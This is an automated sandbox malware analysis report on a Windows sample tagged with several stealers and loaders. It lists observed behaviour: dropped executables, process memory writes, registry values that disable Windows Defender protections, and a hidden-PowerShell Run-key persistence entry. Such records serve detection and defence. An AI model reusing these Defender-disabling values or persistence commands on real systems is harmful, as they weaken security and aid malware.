Malware Analysis Report

2025-08-05 16:12

Sample ID 231026-hcw6tseb57
Target f66b2258a70968303673ee418b5d5307.exe
SHA256 c79258569f98eb2be24996d902fcf73bc6aef9d50600591c2b9a818107cfd3e9
Tags
amadey dcrat glupteba raccoon redline smokeloader zgrat 6a6a005b9aa778f606280c5fa24ae595 @ytlogsbot grome kinza up3 backdoor discovery dropper evasion infostealer loader persistence rat spyware stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

c79258569f98eb2be24996d902fcf73bc6aef9d50600591c2b9a818107cfd3e9

Threat Level: Known bad

The file f66b2258a70968303673ee418b5d5307.exe was found to be: Known bad.

Malicious Activity Summary

amadey dcrat glupteba raccoon redline smokeloader zgrat 6a6a005b9aa778f606280c5fa24ae595 @ytlogsbot grome kinza up3 backdoor discovery dropper evasion infostealer loader persistence rat spyware stealer trojan

Detect ZGRat V1

DcRat

Raccoon

Glupteba payload

ZGRat

SmokeLoader

Glupteba

Raccoon Stealer payload

RedLine

RedLine payload

Amadey

Modifies Windows Defender Real-time Protection settings

Modifies boot configuration data using bcdedit

Stops running service(s)

Modifies Windows Firewall

Downloads MZ/PE file

Possible attempt to disable PatchGuard

Windows security modification

Checks BIOS information in registry

Executes dropped EXE

Reads user/profile data of web browsers

Loads dropped DLL

Legitimate hosting services abused for malware hosting/C2

Accesses cryptocurrency files/wallets, possible credential harvesting

Checks installed software on the system

Adds Run key to start application

Suspicious use of SetThreadContext

Drops file in System32 directory

Drops file in Windows directory

Launches sc.exe

Enumerates physical storage devices

Unsigned PE

Program crash

Checks SCSI registry key(s)

Suspicious use of SetWindowsHookEx

Suspicious use of FindShellTrayWindow

Suspicious behavior: EnumeratesProcesses

Enumerates system info in registry

Modifies Internet Explorer settings

Suspicious use of WriteProcessMemory

Suspicious use of SendNotifyMessage

Suspicious behavior: GetForegroundWindowSpam

Uses Task Scheduler COM API

Suspicious use of AdjustPrivilegeToken

Creates scheduled task(s)

Suspicious behavior: MapViewOfSection

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-10-26 06:36

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-10-26 06:36

Reported

2023-10-26 06:38

Platform

win7-20231023-en

Max time kernel

81s

Max time network

155s

Command Line

"C:\Users\Admin\AppData\Local\Temp\f66b2258a70968303673ee418b5d5307.exe"

Signatures

Amadey

trojan amadey

Detect ZGRat V1

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Glupteba

loader dropper glupteba

Glupteba payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Modifies Windows Defender Real-time Protection settings

evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Users\Admin\AppData\Local\Temp\F136.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\F136.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\Users\Admin\AppData\Local\Temp\F136.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Users\Admin\AppData\Local\Temp\F136.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\F136.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Users\Admin\AppData\Local\Temp\F136.exe N/A

Raccoon

stealer raccoon

Raccoon Stealer payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

SmokeLoader

trojan backdoor smokeloader

ZGRat

rat zgrat

Downloads MZ/PE file

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A

Possible attempt to disable PatchGuard

evasion

Stops running service(s)

evasion

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\7zS6E5D.tmp\Install.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\EC81.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ED7B.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ro3WO0Cp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\dW9uy8Yx.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\F00D.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\F136.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\ni8Zb1nN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\ZJ3VJ7hO.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1Yv41KG8.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\FEBF.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2sA143dW.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\458F.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\483F.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\4A62.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5932.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\kos4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\latestX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS5BD6.tmp\Install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS6E5D.tmp\Install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\EC81.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\EC81.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ro3WO0Cp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ro3WO0Cp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\dW9uy8Yx.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\dW9uy8Yx.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\ni8Zb1nN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\ni8Zb1nN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\ZJ3VJ7hO.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\ZJ3VJ7hO.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\ZJ3VJ7hO.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1Yv41KG8.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\ZJ3VJ7hO.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2sA143dW.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\458F.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\458F.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\458F.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\458F.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\458F.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\458F.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\458F.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS5BD6.tmp\Install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS5BD6.tmp\Install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS5BD6.tmp\Install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS5BD6.tmp\Install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS6E5D.tmp\Install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS6E5D.tmp\Install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS6E5D.tmp\Install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5932.exe N/A
N/A N/A N/A N/A

Reads user/profile data of web browsers

spyware stealer

Windows security modification

evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features C:\Users\Admin\AppData\Local\Temp\F136.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\Temp\F136.exe N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\EC81.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ro3WO0Cp.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\dW9uy8Yx.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\ni8Zb1nN.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup4 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP004.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\ZJ3VJ7hO.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2085049433-1067986815-1244098655-1000\Software\Microsoft\Windows\CurrentVersion\Run\socks5 = "powershell.exe -windowstyle hidden -Command \"& 'C:\\Users\\Admin\\AppData\\Local\\Temp\\483F.exe'\"" C:\Users\Admin\AppData\Local\Temp\483F.exe N/A

Checks installed software on the system

discovery

Legitimate hosting services abused for malware hosting/C2

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\system32\GroupPolicy\gpt.ini C:\Users\Admin\AppData\Local\Temp\7zS6E5D.tmp\Install.exe N/A
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\Wanugegulaho milorahaxah mosuraxupib rusekutokefod bopujune C:\Users\Admin\AppData\Local\Temp\FEBF.exe N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Users\Admin\AppData\Local\Temp\7zS6E5D.tmp\Install.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Users\Admin\AppData\Local\Temp\7zS6E5D.tmp\Install.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2085049433-1067986815-1244098655-1000\Software\Microsoft\Internet Explorer\GPU C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2085049433-1067986815-1244098655-1000\Software\Microsoft\Internet Explorer\IETld\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2085049433-1067986815-1244098655-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2085049433-1067986815-1244098655-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2085049433-1067986815-1244098655-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2085049433-1067986815-1244098655-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2085049433-1067986815-1244098655-1000\Software\Microsoft\Internet Explorer\PageSetup C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2085049433-1067986815-1244098655-1000\Software\Microsoft\Internet Explorer\Toolbar C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2085049433-1067986815-1244098655-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2085049433-1067986815-1244098655-1000\Software\Microsoft\Internet Explorer\Zoom C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2085049433-1067986815-1244098655-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2085049433-1067986815-1244098655-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2085049433-1067986815-1244098655-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2085049433-1067986815-1244098655-1000\Software\Microsoft\Internet Explorer\LowRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2085049433-1067986815-1244098655-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2085049433-1067986815-1244098655-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2085049433-1067986815-1244098655-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{12317FF1-73CA-11EE-A123-5AAA8EBA5435} = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2085049433-1067986815-1244098655-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2085049433-1067986815-1244098655-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2085049433-1067986815-1244098655-1000\Software\Microsoft\Internet Explorer\IntelliForms C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2085049433-1067986815-1244098655-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2085049433-1067986815-1244098655-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2085049433-1067986815-1244098655-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2085049433-1067986815-1244098655-1000\Software\Microsoft\Internet Explorer\InternetRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\F136.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\FEBF.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\kos4.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1140 wrote to memory of 1576 N/A C:\Users\Admin\AppData\Local\Temp\f66b2258a70968303673ee418b5d5307.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1140 wrote to memory of 1576 N/A C:\Users\Admin\AppData\Local\Temp\f66b2258a70968303673ee418b5d5307.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1140 wrote to memory of 1576 N/A C:\Users\Admin\AppData\Local\Temp\f66b2258a70968303673ee418b5d5307.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1140 wrote to memory of 1576 N/A C:\Users\Admin\AppData\Local\Temp\f66b2258a70968303673ee418b5d5307.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1140 wrote to memory of 1576 N/A C:\Users\Admin\AppData\Local\Temp\f66b2258a70968303673ee418b5d5307.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1140 wrote to memory of 1576 N/A C:\Users\Admin\AppData\Local\Temp\f66b2258a70968303673ee418b5d5307.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1140 wrote to memory of 1576 N/A C:\Users\Admin\AppData\Local\Temp\f66b2258a70968303673ee418b5d5307.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1140 wrote to memory of 1576 N/A C:\Users\Admin\AppData\Local\Temp\f66b2258a70968303673ee418b5d5307.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1140 wrote to memory of 1576 N/A C:\Users\Admin\AppData\Local\Temp\f66b2258a70968303673ee418b5d5307.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1140 wrote to memory of 1576 N/A C:\Users\Admin\AppData\Local\Temp\f66b2258a70968303673ee418b5d5307.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1380 wrote to memory of 2740 N/A N/A C:\Users\Admin\AppData\Local\Temp\EC81.exe
PID 1380 wrote to memory of 2740 N/A N/A C:\Users\Admin\AppData\Local\Temp\EC81.exe
PID 1380 wrote to memory of 2740 N/A N/A C:\Users\Admin\AppData\Local\Temp\EC81.exe
PID 1380 wrote to memory of 2740 N/A N/A C:\Users\Admin\AppData\Local\Temp\EC81.exe
PID 1380 wrote to memory of 2740 N/A N/A C:\Users\Admin\AppData\Local\Temp\EC81.exe
PID 1380 wrote to memory of 2740 N/A N/A C:\Users\Admin\AppData\Local\Temp\EC81.exe
PID 1380 wrote to memory of 2740 N/A N/A C:\Users\Admin\AppData\Local\Temp\EC81.exe
PID 1380 wrote to memory of 2736 N/A N/A C:\Users\Admin\AppData\Local\Temp\ED7B.exe
PID 1380 wrote to memory of 2736 N/A N/A C:\Users\Admin\AppData\Local\Temp\ED7B.exe
PID 1380 wrote to memory of 2736 N/A N/A C:\Users\Admin\AppData\Local\Temp\ED7B.exe
PID 1380 wrote to memory of 2736 N/A N/A C:\Users\Admin\AppData\Local\Temp\ED7B.exe
PID 1380 wrote to memory of 2528 N/A N/A C:\Windows\system32\cmd.exe
PID 1380 wrote to memory of 2528 N/A N/A C:\Windows\system32\cmd.exe
PID 1380 wrote to memory of 2528 N/A N/A C:\Windows\system32\cmd.exe
PID 2740 wrote to memory of 2452 N/A C:\Users\Admin\AppData\Local\Temp\EC81.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ro3WO0Cp.exe
PID 2740 wrote to memory of 2452 N/A C:\Users\Admin\AppData\Local\Temp\EC81.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ro3WO0Cp.exe
PID 2740 wrote to memory of 2452 N/A C:\Users\Admin\AppData\Local\Temp\EC81.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ro3WO0Cp.exe
PID 2740 wrote to memory of 2452 N/A C:\Users\Admin\AppData\Local\Temp\EC81.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ro3WO0Cp.exe
PID 2740 wrote to memory of 2452 N/A C:\Users\Admin\AppData\Local\Temp\EC81.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ro3WO0Cp.exe
PID 2740 wrote to memory of 2452 N/A C:\Users\Admin\AppData\Local\Temp\EC81.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ro3WO0Cp.exe
PID 2740 wrote to memory of 2452 N/A C:\Users\Admin\AppData\Local\Temp\EC81.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ro3WO0Cp.exe
PID 2452 wrote to memory of 1400 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ro3WO0Cp.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\dW9uy8Yx.exe
PID 2452 wrote to memory of 1400 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ro3WO0Cp.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\dW9uy8Yx.exe
PID 2452 wrote to memory of 1400 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ro3WO0Cp.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\dW9uy8Yx.exe
PID 2452 wrote to memory of 1400 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ro3WO0Cp.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\dW9uy8Yx.exe
PID 2452 wrote to memory of 1400 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ro3WO0Cp.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\dW9uy8Yx.exe
